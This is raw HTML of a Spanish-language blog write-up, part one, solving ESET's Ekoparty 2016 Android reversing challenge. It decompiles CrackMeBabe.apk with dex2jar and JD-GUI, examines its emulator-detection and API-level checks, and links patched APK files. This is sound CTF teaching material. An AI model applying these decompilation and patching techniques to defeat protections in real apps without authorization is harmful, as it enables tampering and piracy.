<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuGO8dWA4o_Nhmbtq4aMRR3fzf6qFEN-3jhP3hqGJmErQrXlsocS6SfPY65KMsTQdpOeeHBzQVv2Hy7Rz0nnmsDaR9_uQ3y1t7ht9TJdUIOh-XhyphenhyphenkYykXwd2S_L2RYzZgVnkLL_PHogY/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuGO8dWA4o_Nhmbtq4aMRR3fzf6qFEN-3jhP3hqGJmErQrXlsocS6SfPY65KMsTQdpOeeHBzQVv2Hy7Rz0nnmsDaR9_uQ3y1t7ht9TJdUIOh-XhyphenhyphenkYykXwd2S_L2RYzZgVnkLL_PHogY/s640/10.jpg" width="412" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6K_1Hbuj_Qo2Mbs5ejmKahfEc931jgfLYZRXA62W44gUICuyL1533sMivukh8ENYcMoZfn2HEPAdNdrJzZjQci9dUMovxAbfRaxSNcjjvic1KJCWujW4E7shcOmxzYUMZJ-nV1sxNOok/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6K_1Hbuj_Qo2Mbs5ejmKahfEc931jgfLYZRXA62W44gUICuyL1533sMivukh8ENYcMoZfn2HEPAdNdrJzZjQci9dUMovxAbfRaxSNcjjvic1KJCWujW4E7shcOmxzYUMZJ-nV1sxNOok/s640/09.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Les dejo el apk original y la modificada con los archivos SMALI que toque.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://dl.dropboxusercontent.com/u/80008916/Crackmeharder.7z</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;" /></div>
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;">Eso es todo por este 2016 @Dkavalanche </span></span><span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span><br />
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ICO36zexR_mspqWTYnLN__WoSPiHvKUnQrnRtZCWy6l5qmqrAfFHtBHfmTtNniarh16zXKBULbQbTyLwsTy7u6zSs845jPS38uD_YnqXAkVU-7yuVpTO-6ap5TARVaCUVhhRYOLfIhE/s1600/foto_0000000720141222134251-e1419999692858.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ICO36zexR_mspqWTYnLN__WoSPiHvKUnQrnRtZCWy6l5qmqrAfFHtBHfmTtNniarh16zXKBULbQbTyLwsTy7u6zSs845jPS38uD_YnqXAkVU-7yuVpTO-6ap5TARVaCUVhhRYOLfIhE/s200/foto_0000000720141222134251-e1419999692858.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-23105696298429463302016-12-26T18:52:00.000-08:002016-12-27T04:52:17.464-08:00<b>Resolviendo el reto Nro 10 Android de ESET Ekoparty 2016 #eko12 - PARTE 1</b><br />
<b><br /></b>
<b><br /></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Buenas, decidí terminar el año posteando como resolver este reto Android de ESET que me pareció muy bueno.</span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Vamos a necesitar <a href="https://github.com/APK-Multi-Tool/APK-Multi-Tool">APK-Multi-tool</a>, <a href="https://sourceforge.net/p/dex2jar/wiki/Home/">dex2jar</a>, <a href="http://jd.benow.ca/">JD-GUI</a>, <a href="http://signapk.jar/">signapk.jar</a> y un emulador de Android, en mi caso use<a href="https://www.bignox.com/"> bigNOX</a> porque tengo una maquina con AMD y el emulador de Google de Windows no permite la aceleración de VM si no se posee un cpu Intel.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">El Desafio:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">**************************************************</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Este es el desafío de reversing en Android.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Para encontrar el flag deberás utilizar técnicas sencillas de análisis de APK y algo de ingenio.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Al comienzo, probablemente debas utilizar algún motor de búsqueda para dar con la contraseña correcta, que es la respuesta a una adivinanza.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Encontrarás pistas que te guiarán en la dirección correcta.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Mucha suerte y happy reversing.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<b style="font-size: small;">ROMPIENDO </b><b>CrackMeBabe.apk </b><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">SHA256:</span><span class="Apple-tab-span" style="font-size: x-small; white-space: pre;"> </span><span style="font-size: x-small;">ca80b0c050233ad6c9d70793ba76effeaffb9ede79508993f965beb04598233d</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Cargamos el APK y ni bien lo lanzamos obtenemos la siguiente imagen de un personaje de Tv, por lo que se debe estar haciendo algún tipo de comprobación.</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo0DweFKJr5Tr4itIsHT0_npKRyK8F4YzvDSMZeArhalnjn4B8bFEQkrb1pkjhYA1R8TnMACd8QjhBe-nAAP-9UssvCkE9esnAV_nGPNVWttaoyeXUUJkXWWq1_MuKjD7zfUK7oCsikms/s1600/wrong.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo0DweFKJr5Tr4itIsHT0_npKRyK8F4YzvDSMZeArhalnjn4B8bFEQkrb1pkjhYA1R8TnMACd8QjhBe-nAAP-9UssvCkE9esnAV_nGPNVWttaoyeXUUJkXWWq1_MuKjD7zfUK7oCsikms/s400/wrong.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Decompilamos el APK con Multi-tool opción 9, con el obtendremos los archivos SMALI y el classes.dex que luego lo pasaremos por el dex2jar para obtener un .jar para abrirlo con el JD-Gui</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s1600/000.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s640/000.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">d2j-dex2jar.bat classes.dex </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">dex2jar classes.dex -> .\classes-dex2jar.jar</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">JD-Gui</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLVAxnjVX-_0m1nPaLdIWJg6ECnXGncDCEMmSAO7KfgLcGuxzynEogJZzghqml1QPOtuVb2Fy_rkAz6DzDXkROs-5NPeGpnKzQePainypgTGdTR5hDfm0o_iZnR1iulJP7kqZhbKkkovk/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLVAxnjVX-_0m1nPaLdIWJg6ECnXGncDCEMmSAO7KfgLcGuxzynEogJZzghqml1QPOtuVb2Fy_rkAz6DzDXkROs-5NPeGpnKzQePainypgTGdTR5hDfm0o_iZnR1iulJP7kqZhbKkkovk/s640/login.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Tenemos varias classes (</span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Login, a, b, c, d, e, f</b>)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Vamos a repasar a ojo de pájaro las principales funciones que me van a permitir sortear el entuerto.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Class f</span></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Función <b> chk </b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">(se hacen comprobaciones de que tipo de dispositivo se esta utilizando y lo comprueba con un llamado a la clase <b>d</b>)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((!Build.MODEL.contains(d.h)) && (!Build.MODEL.contains(d.i)) && (!Build.MODEL.contains(d.m)) && (!Build.FINGERPRINT.startsWith(d.k)) && (!Build.FINGERPRINT.startsWith(d.l)) && (!Build.MANUFACTURER.contains(d.n)) && (!Build.PRODUCT.contains(d.c)) && (!Build.MODEL.contains(d.c)))</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;">Función <b>chks(boolean) </b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return Build.VERSION.SDK_INT == 22;</span><br />
<span style="font-size: x-small;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;">Retorna verdadero si la versión del APLI level es 22 (Android Lollipop 5.0 - 5.1.1)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Por lo que tendríamos que ejecutarlo en un dispositivo con ese nivel de S.O. o emularlo con el AVD correspondiente.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdQIBEsQlqdcMWIWdvzwun7DgsUVaIP_vGBevjkarziW_FAwuGdr-MeB6lnw8CXFHttqeqzbd4xhSH51RTJhgx6VbJQwSwBh1_9T_JWX4_7YSnBLz4LTrlfIee2LYUumEnowCtAub_ezk/s1600/avd.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdQIBEsQlqdcMWIWdvzwun7DgsUVaIP_vGBevjkarziW_FAwuGdr-MeB6lnw8CXFHttqeqzbd4xhSH51RTJhgx6VbJQwSwBh1_9T_JWX4_7YSnBLz4LTrlfIee2LYUumEnowCtAub_ezk/s320/avd.jpg" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<table class="wikitable sortable jquery-tablesorter" style="background-color: #f8f9fa; border-collapse: collapse; border: 1px solid rgb(162, 169, 177); color: black; font-family: sans-serif; font-size: 14px; margin: 1em 0px;"><thead>
<tr><th class="headerSort" role="columnheader button" style="background-color: #eaecf0; background-image: linear-gradient(transparent, transparent), url("data:image/svg+xml,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2021%209%22%20height%3D%229%22%20width%3D%2221%22%3E%0A%20%20%20%20%3Cpath%20d%3D%22M14.5%205l-4%204-4-4zM14.5%204l-4-4-4%204z%22%2F%3E%0A%3C%2Fsvg%3E%0A"); background-position: right center; background-repeat: no-repeat; border: 1px solid rgb(170, 170, 170); cursor: pointer; padding: 0.2em 21px 0.2em 0.4em; text-align: center;" tabindex="0" title="Orden ascendente">Nombre código</th><th class="headerSort" role="columnheader button" style="background-color: #eaecf0; background-image: linear-gradient(transparent, transparent), url("data:image/svg+xml,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2021%209%22%20height%3D%229%22%20width%3D%2221%22%3E%0A%20%20%20%20%3Cpath%20d%3D%22M14.5%205l-4%204-4-4zM14.5%204l-4-4-4%204z%22%2F%3E%0A%3C%2Fsvg%3E%0A"); background-position: right center; background-repeat: no-repeat; border: 1px solid rgb(170, 170, 170); cursor: pointer; padding: 0.2em 21px 0.2em 0.4em; text-align: center;" tabindex="0" title="Orden ascendente">Número de versión</th><th class="headerSort" role="columnheader button" style="background-color: #eaecf0; background-image: linear-gradient(transparent, transparent), url("data:image/svg+xml,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2021%209%22%20height%3D%229%22%20width%3D%2221%22%3E%0A%20%20%20%20%3Cpath%20d%3D%22M14.5%205l-4%204-4-4zM14.5%204l-4-4-4%204z%22%2F%3E%0A%3C%2Fsvg%3E%0A"); background-position: right center; background-repeat: no-repeat; border: 1px solid rgb(170, 170, 170); cursor: pointer; padding: 0.2em 21px 0.2em 0.4em; text-align: center;" tabindex="0" title="Orden ascendente">Fecha de lanzamiento</th><th class="headerSort" role="columnheader button" style="background-color: #eaecf0; background-image: linear-gradient(transparent, transparent), url("data:image/svg+xml,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2021%209%22%20height%3D%229%22%20width%3D%2221%22%3E%0A%20%20%20%20%3Cpath%20d%3D%22M14.5%205l-4%204-4-4zM14.5%204l-4-4-4%204z%22%2F%3E%0A%3C%2Fsvg%3E%0A"); background-position: right center; background-repeat: no-repeat; border: 1px solid rgb(170, 170, 170); cursor: pointer; padding: 0.2em 21px 0.2em 0.4em; text-align: center;" tabindex="0" title="Orden ascendente">Nivel de API</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">Apple Pie</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">1.0</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/23_de_septiembre" style="background: none; color: #0b0080; text-decoration: none;" title="23 de septiembre" wotsearchprocessed="true">23 de septiembre</a> de <a href="https://es.wikipedia.org/wiki/2008" style="background: none; color: #0b0080; text-decoration: none;" title="2008" wotsearchprocessed="true">2008</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">Banana Bread</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">1.1</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/9_de_febrero" style="background: none; color: #0b0080; text-decoration: none;" title="9 de febrero" wotsearchprocessed="true">9 de febrero</a> de <a href="https://es.wikipedia.org/wiki/2009" style="background: none; color: #0b0080; text-decoration: none;" title="2009" wotsearchprocessed="true">2009</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">2</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Cupcake" style="background: none; color: #0b0080; text-decoration: none;" title="Android Cupcake" wotsearchprocessed="true">Cupcake</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">1.5</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/27_de_abril" style="background: none; color: #0b0080; text-decoration: none;" title="27 de abril" wotsearchprocessed="true">27 de abril</a> de <a href="https://es.wikipedia.org/wiki/2009" style="background: none; color: #0b0080; text-decoration: none;" title="2009" wotsearchprocessed="true">2009</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">3</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a class="new" href="https://es.wikipedia.org/w/index.php?title=Android_Donut&action=edit&redlink=1" style="background: none; color: #a55858; text-decoration: none;" title="Android Donut (aún no redactado)" wotsearchprocessed="true">Donut</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">1.6</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/15_de_septiembre" style="background: none; color: #0b0080; text-decoration: none;" title="15 de septiembre" wotsearchprocessed="true">15 de septiembre</a> de <a href="https://es.wikipedia.org/wiki/2009" style="background: none; color: #0b0080; text-decoration: none;" title="2009" wotsearchprocessed="true">2009</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">4</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Eclair" style="background: none; color: #0b0080; text-decoration: none;" title="Android Eclair" wotsearchprocessed="true">Eclair</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">2.0–2.1</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/26_de_octubre" style="background: none; color: #0b0080; text-decoration: none;" title="26 de octubre" wotsearchprocessed="true">26 de octubre</a> de <a href="https://es.wikipedia.org/wiki/2009" style="background: none; color: #0b0080; text-decoration: none;" title="2009" wotsearchprocessed="true">2009</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">5–7</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a class="new" href="https://es.wikipedia.org/w/index.php?title=Android_Froyo&action=edit&redlink=1" style="background: none; color: #a55858; text-decoration: none;" title="Android Froyo (aún no redactado)" wotsearchprocessed="true">Froyo</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">2.2–2.2.3</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/20_de_mayo" style="background: none; color: #0b0080; text-decoration: none;" title="20 de mayo" wotsearchprocessed="true">20 de mayo</a> de <a href="https://es.wikipedia.org/wiki/2010" style="background: none; color: #0b0080; text-decoration: none;" title="2010" wotsearchprocessed="true">2010</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">8</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Gingerbread" style="background: none; color: #0b0080; text-decoration: none;" title="Android Gingerbread" wotsearchprocessed="true">Gingerbread</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">2.3–2.3.7</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/6_de_diciembre" style="background: none; color: #0b0080; text-decoration: none;" title="6 de diciembre" wotsearchprocessed="true">6 de diciembre</a> de <a href="https://es.wikipedia.org/wiki/2010" style="background: none; color: #0b0080; text-decoration: none;" title="2010" wotsearchprocessed="true">2010</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">9–10</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Honeycomb" style="background: none; color: #0b0080; text-decoration: none;" title="Android Honeycomb" wotsearchprocessed="true">Honeycomb</a><sup class="reference" id="cite_ref-1" style="line-height: 1em; unicode-bidi: isolate; white-space: nowrap;"><a href="https://es.wikipedia.org/wiki/Anexo:Historial_de_versiones_de_Android#cite_note-1" style="background: none; color: #0b0080; text-decoration: none;" wotsearchprocessed="true">1</a></sup></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">3.0–3.2.6</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/22_de_febrero" style="background: none; color: #0b0080; text-decoration: none;" title="22 de febrero" wotsearchprocessed="true">22 de febrero</a> de <a href="https://es.wikipedia.org/wiki/2011" style="background: none; color: #0b0080; text-decoration: none;" title="2011" wotsearchprocessed="true">2011</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">11–13</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Ice_Cream_Sandwich" style="background: none; color: #0b0080; text-decoration: none;" title="Android Ice Cream Sandwich" wotsearchprocessed="true">Ice Cream Sandwich</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">4.0–4.0.4</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/18_de_octubre" style="background: none; color: #0b0080; text-decoration: none;" title="18 de octubre" wotsearchprocessed="true">18 de octubre</a> de <a href="https://es.wikipedia.org/wiki/2011" style="background: none; color: #0b0080; text-decoration: none;" title="2011" wotsearchprocessed="true">2011</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">14–15</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Jelly_Bean" style="background: none; color: #0b0080; text-decoration: none;" title="Android Jelly Bean" wotsearchprocessed="true">Jelly Bean</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">4.1–4.3.1</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/9_de_julio" style="background: none; color: #0b0080; text-decoration: none;" title="9 de julio" wotsearchprocessed="true">9 de julio</a> de <a href="https://es.wikipedia.org/wiki/2012" style="background: none; color: #0b0080; text-decoration: none;" title="2012" wotsearchprocessed="true">2012</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">16–18</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_KitKat" style="background: none; color: #0b0080; text-decoration: none;" title="Android KitKat" wotsearchprocessed="true">KitKat</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">4.4–4.4.4, 4.4W–4.4W.2</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/31_de_octubre" style="background: none; color: #0b0080; text-decoration: none;" title="31 de octubre" wotsearchprocessed="true">31 de octubre</a> de <a href="https://es.wikipedia.org/wiki/2013" style="background: none; color: #0b0080; text-decoration: none;" title="2013" wotsearchprocessed="true">2013</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">19–20</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Lollipop" style="background: none; text-decoration: none;" title="Android Lollipop" wotsearchprocessed="true"><b><span style="color: #cc0000;">Lollipop</span></b></a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><b><span style="color: #cc0000;">5.0–5.1.1</span></b></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><b><span style="color: #cc0000;"><a href="https://es.wikipedia.org/wiki/12_de_noviembre" style="background: none; text-decoration: none;" title="12 de noviembre" wotsearchprocessed="true">12 de noviembre</a> de <a href="https://es.wikipedia.org/wiki/2014" style="background: none; text-decoration: none;" title="2014" wotsearchprocessed="true">2014</a></span></b></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><b><span style="color: #cc0000;">21–22</span></b></td></tr>
